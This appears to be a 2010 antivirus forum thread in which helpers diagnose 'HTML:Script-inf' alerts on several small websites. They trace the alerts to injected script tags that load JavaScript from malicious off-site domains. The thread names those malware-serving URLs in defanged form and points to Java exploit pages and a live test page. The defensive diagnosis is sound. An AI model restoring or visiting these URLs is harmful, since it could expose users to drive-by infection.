Re: HTML:Script-inf on website

Help~ Can someone please check the site"
hxxp:happytailstucson.com

We have clients who use our site to log in and now have avast and they are told malware with the following message: Re: HTML:Script-inf

if cannot check it, please let me know how I can check the site. I have looked and scanned all uploaded files and find not a thing!

Thanks million!
Cinvan

NoVirusThanks - INFECTED
http://scanner.novirusthanks.org/analysis/7dc646f25ce6cd9828efd81edf44192e/aW5kZXg=/

VirusTotal - happytailstucson.com.htm - 7/41
http://www.virustotal.com/analisis/094ae96089fbaa86c4864a9c7a778683dbd4baad1f574f6a88d86227cf323bf7-1278190036

Wepawet - benign
http://wepawet.cs.ucsb.edu/view.php?hash=efac09ad5c81e2a6305383fa84cac3db&t=1278190990&type=js

This page seems to be References to 1 suspicious domain found.
http://www.UnmaskParasites.com/security-report/?page=www.happytailspetservices.com

URLVoid

Report 2010-07-03 23:05:02 (GMT 1)
Website happytailspetservices.com
Domain Hash 0455f15839fb3e0e8f659e13e4975e58
IP Address 173.201.137.68 [SCAN]
IP Hostname ip-173-201-137-68.ip.secureserver.net
IP Country US (United States)
AS Number 26496
AS Name PAH-INC - GoDaddy.com, Inc.
Detections 1 / 17 (6 %)
Status SUSPICIOUS Scanning site with: Finjan DETECTED

VirusTotal - unp224562320.tmp - 7/41 - INFECTED
http://www.virustotal.com/analisis/094ae96089fbaa86c4864a9c7a778683dbd4baad1f574f6a88d86227cf323bf7-1278187804

The actual alert is on happytailspetservices.com where data is imported from and not from the happytailstucson.com, see image1.

There is a script tag outside the closing html tag, a standards no, no and highly suspect. It is trying to run a javascript file from another site (which has nothing to do with yahoo), see image2. This is a malicious site which would be blocked by avast (image3) and firefox (image4) also see, https://safeweb.norton.com/report/show?name=blackhulu.com.

So it looks like the happytailspetservices.com site has been hacked and the detection is most certainly correct.

ohooo yes, that gave a different scan result…forgot to look at the url in the avast popup :-[ Edit my scanns above

Yes, it is easy to ignore what is in front of your nose when the alert is apparently coming from a parent site ;D

@ cinvan1121
Now you have to contact the hacked site or check it out if it is within your control and remove inserted script tag. More importantly you need to close whatever vulnerability that has allowed the site to be exploited/hacked.

Hi Pondus and DavidR,

Therefore unmasked parasites is such a good resource, because it gives you all redirects and subdomains and links, and you have to check these also separately. And just scanners that take the main domain fail to get all the malcode that way: happytailspetservices.com - but the infection and the suspicious script is: assolkh.blackhulu.com suspicious :arrow_upper_right: - displaying 1 of 1

* <Script> link - htxp://assolkh.blackhulu.com:8080/Yahoo.js
Malicious software includes 31 exploits, 13 trojans, 1 scripting exploits.
Threat Name: 	Bloodhound.Exploit.292
 Location: 	htxp://assolkh.blackhulu.com:8080/Applet1.html 

This site was hosted on 1 network including AS7795 (NTELOSINC).

Has this site acted as an intermediary resulting in further distribution of malware?

Over the past 90 days, blackhulu.com appeared to function as an intermediary for the infection of 12 sites including techmyhelp.com/, skyventure.com.my/, setdaccio.com/.

Has this site hosted malware?

Yes, this site has hosted malicious software over the past 90 days. It infected 74 domains, including raidmax.com/, thavage.com/, vestonkhuongduy.com/,

polonus

P.S. Example of this iFrame injection here: htxp://jsunpack.jeek.org/dec/go?report=63af26934bd3bb5f3f7df4e128e4a7ea4b8eb332 (Open with NS active, malicious)
What is it? It comes courtesy of a java deployment toolkit - example:
2010/05/15_21:10 yoursoap.ru:8080/Applet1html 174.137.179.244 digit-colo.amsnl.webaircom. exploit for java deployment toolkit veerATmaillife.ru 36057
will only attempt to infect Internet Explorer and Google Chrome users, so use Fx with NS and RP active!

D

The final target and what malware might be on it is immaterial as avast doesn’t allow it to get anywhere near it.

The problem in this case as the OP is concerned about the fact avast alerts on their site happytailstucson.com, because a cross site link where date is imported from happytailspetservices.com has been hacked and it is that which avast is alerting on because it has been hacked with the insertion of the script tag.

We don’t really need to know what is on blackhulu.com as that could well change at the drop of a hat. We are trying to help the OP to resolve their problem which has nothing to do with the payload at blackhulu.com; that problem is the hacking of happytailspetservices.com.

If that problem is resolved then the final destination is immaterial; we don’t need to go to that depth to help the OP to resolve their problem other than say the detection is good.

Thanks so much! I was able to clean the site up. Now to figure out how the site is been hacked.
thanks, once again.

Hi cinvan1121,

The site has been hacked via a java exploit, so check to have the latest java there, and it might well be that thanks to avast users never came even close to the malware (if there was an active payload at the time), because they were disconnected or alerted well in advance, malcode nor exploits belong on a reputable website, they should be cleansed,

polonus

You’re welcome, happy hunting.

Try checking this out - Tips for Cleaning & Securing Your Website, http://www.stopbadware.org/home/security.

Hi malware fighters,

This browser exploit malware is found in gigantic numbers, look here: we have about 614,000 results (0.30 seconds)
Just Googled for it: http://www.google.com/search?client=flock&channel=fds&q=8080%2FApplet1.html&ie=utf-8&oe=utf-8&aq=t
We reported a similar website infection here: http://forum.avast.com/index.php?topic=60161.msg517966#msg517966
And this is what it is: exploit for java deployment toolkit
Another one: betafleet.ru:8080/Applet1.html Threat name : Exploit JSE Webstart (type 1066)
Aand another one here: http://support.clean-mx.de/clean-mx/viruses?response=&id=563414
http://www.vupen.com/english/advisories/2010/0853
A testpage can be found here, but do not go there because of an avast alert:
htxp://lock.cmpxchg8b.com/bb5eafbc6c6e67e11c4afc88b4e1dd22/testcase.html

polonus

Hello There,

We are having a similar issue with website wXw.osundefender.org , avast seems to be detecting virus HTML:Script-Inf, I have ran website through a number of online scanners (Dr. Web, NovirusThanksYou) and none seem to detect this… Could this be a case of Avast blacklisting the website? Please advise…

The css file that is called from the index page appears to have been hacked see image1, apart from css instructions there is a script tag to an off site URL, which is suspect, image2. The same script tag is also at the end of the index.php page causing avast to alert on that too image3.

See http://www.virustotal.com/analisis/2ede96821a8ba0d2c1847202a57a4ac97487c3af080f9f91e3f28d584655065b-1278884642 results of css file scan.

See http://www.virustotal.com/analisis/9e645c5ec194e6ae7cbaf9264f9f5930c17b904c56ba8ba4d632f26f51efe3a5-1278884817 results of scan of index.php page.

So it isn’t only avast detecting this, though there are actually very few even looking for this type of thing much less detect it.

The site that the script tag tries to run is one that avast considers a malicious site image4, avast isn’t the only on that considers this Russian site malicious, http://www.mywot.com/en/scorecard/holasionweb.com.

Please ‘modify’ your post change the URL from http to hXXp or www to wXw, to break the link and avoid accidental exposure to suspect sites, thanks.

Well the sublink is there on unmasked parasites:
The last time Google visited this site was on 2010-05-21, and the last time suspicious content was found on this site was on 2010-05-20.

Malicious software includes 109 scripting exploits, 1 trojan.

This site was hosted on 4 network(s) including AS50108 (KALUGANET), AS16276 (OVH), AS2588 (LATNETSERVISS).

Has this site acted as an intermediary resulting in further distribution of malware?

Over the past 90 days, holasionweb.com appeared to function as an intermediary for the infection of 3 sites including ffl.org/, cosmicbooknews.com/, 365dailynews.com/.

Has this site hosted malware?

Yes, this site has hosted malicious software and it infected 35 domains, including moomha.com/, venciclopedia.com/, pattonwebz.com/. (the last one was reported by me on the avast forums - pol)

It is called holasion.com virus: http://tintation.com/2010/05/13/remove-holasionweb-com-virus-malware/
GoDaddy php was at the crux of the problem, there it started earlier, more on this infection from sucuri here:
http://blog.sucuri.net/2010/05/lots-of-sites-reinfected-now-using-holasionweb-com.html

pol

Hi abdkabit,

You also have to scan all these here: http://www.urlvoid.com/find-parasites/

  1. A HREF htxp://www.osundefender.org SCAN
  2. A HREF htxp://www.osundefender.org/ SCAN
  3. A HREF htxp://www.osundefender.org/ SCAN
  4. A HREF htxp://www.osundefender.org/?page_id=2 SCAN
  5. A HREF htxp://www.osundefender.org/?page_id=2416 SCAN
  6. A HREF htxp://www.osundefender.org/?page_id=3100 SCAN
  7. A HREF htxp://www.osundefender.org/?page_id=3072 SCAN
  8. A HREF htxp://www.osundefender.org/?p=9772 SCAN
  9. A HREF htxp://www.osundefender.org/?cat=346 SCAN
  10. A HREF 	htxp://www.osundefender.org/?p=9772 	SCAN
    
  11. A HREF 	htxp://www.osundefender.org/?p=9765 	SCAN
    
  12. A HREF 	htxp://www.osundefender.org/?cat=346 	SCAN
    
  13. A HREF 	htxp://www.osundefender.org/?p=9765 	SCAN
    
  14. A HREF 	htxp://www.osundefender.org/?p=9757 	SCAN
    
  15. A HREF 	htxp://www.osundefender.org/?cat=346 	SCAN
    
  16. A HREF 	htxp://www.osundefender.org/?p=9757 	SCAN
    
  17. A HREF 	htxp://www.osundefender.org/?p=9753 	SCAN
    
  18. A HREF 	htxp://www.osundefender.org/?cat=346 	SCAN
    
  19. A HREF 	htxp://www.osundefender.org/?p=9753 	SCAN
    
  20. A HREF 	hxtp://www.osundefender.org/?p=9748 	SCAN
    
  21. A HREF 	hxtp://www.osundefender.org/?cat=346 	SCAN
    
  22. A HREF 	hxtp://www.osundefender.org/?p=9748 	SCAN
    
  23. A HREF 	htxp://www.osundefender.org/?p=9772 	SCAN
    
  24. A HREF 	hxtp://www.osundefender.org/?p=9765 	SCAN
    
  25. A HREF 	htxp://www.osundefender.org/?p=9760 	SCAN
    
  26. A HREF 	htxp://www.osundefender.org/?p=9757 	SCAN
    
  27. A HREF 	hxtp://www.osundefender.org/?p=9753 	SCAN
    
  28. A HREF 	htxp://www.osundefender.org/?p=9751 	SCAN
    
  29. A HREF 	htxp://www.osundefender.org/?p=9748 	SCAN
    
  30. A HREF 	hxtp://www.osundefender.org/?p=9733 	SCAN
    
  31. A HREF 	hxtp://www.osundefender.org/?p=9723 	SCAN
    
  32. A HREF 	hxtp://www.osundefender.org/?p=9723 	SCAN
    
  33. A HREF 	hxtp://www.osundefender.org/?p=9669 	SCAN
    
  34. A HREF 	htxp://www.osundefender.org/?p=9669 	SCAN
    
  35. A HREF 	htxp://www.osundefender.org/?p=9636 	SCAN
    
  36. A HREF 	htxp://www.osundefender.org/?p=9636 	SCAN
    
  37. A HREF 	htxp://www.osundefender.org/?p=9602 	SCAN
    
  38. A HREF 	hxtp://www.osundefender.org/?p=9602 	SCAN
    
  39. A HREF 	htxp://www.osundefender.org/?p=9368 	SCAN
    
  40. A HREF 	htxp://www.osundefender.org/?p=9364 	SCAN
    
  41. A HREF 	htxp://www.osundefender.org/?p=9363 	SCAN
    
  42. A HREF 	hxtp://www.osundefender.org/?p=9353 	SCAN
    
  43. A HREF 	hxtp://www.osundefender.org/?p=9369 	SCAN
    
  44. A HREF 	hxtp://www.osundefender.org/?p=9174 	SCAN
    
  45. A HREF 	htxp://www.osundefender.org/?p=9173 	SCAN
    
  46. A HREF 	hxtp://www.osundefender.org/?p=9111 	SCAN
    
  47. A HREF 	htxp://www.osundefender.org/?p=9111 	SCAN
    
  48. A HREF 	htxp://www.osundefender.org/?p=9098 	SCAN
    
  49. A HREF 	htxp://www.osundefender.org/?p=9048 	SCAN
    
  50. A HREF 	htxp://www.osundefender.org/?p=9011 	SCAN
    
  51. SCRIPT 	htxp://www.osundefender.org/wp-includes/js/j... 	SCAN
    
  52. LINK 	htxp://www.osundefender.org/wp-content/plugi... 	SCAN
    

pol

Thanks Guys, May I ask,which is the prefered option of removing this virus:

Thanks a lot for the analysis…

Welcome to StopBadware
http://stopbadware.org/home/index

Tips for Cleaning & Securing Your Website
http://stopbadware.org/home/security

Hi,

Avast free antivirus 5 gives HTML:Script-inf virus alert for the webpage: wxw.sajtorandevu.hu

I had it checked with the designer but there is no code what is wrong there, and we can not figure out the problem, how could I know what is this script that might bother the Avast?

Hi NLQ, welcome to the forum :slight_smile:

Please can you deactivate the link, change www to wXw, to prevent others potentially becoming infected.

The alert is caused by a script in the page, highlighted in the image.

http://www.UnmaskParasites.com/security-report/?page=www.sajtorandevu.hu

It needs to be removed.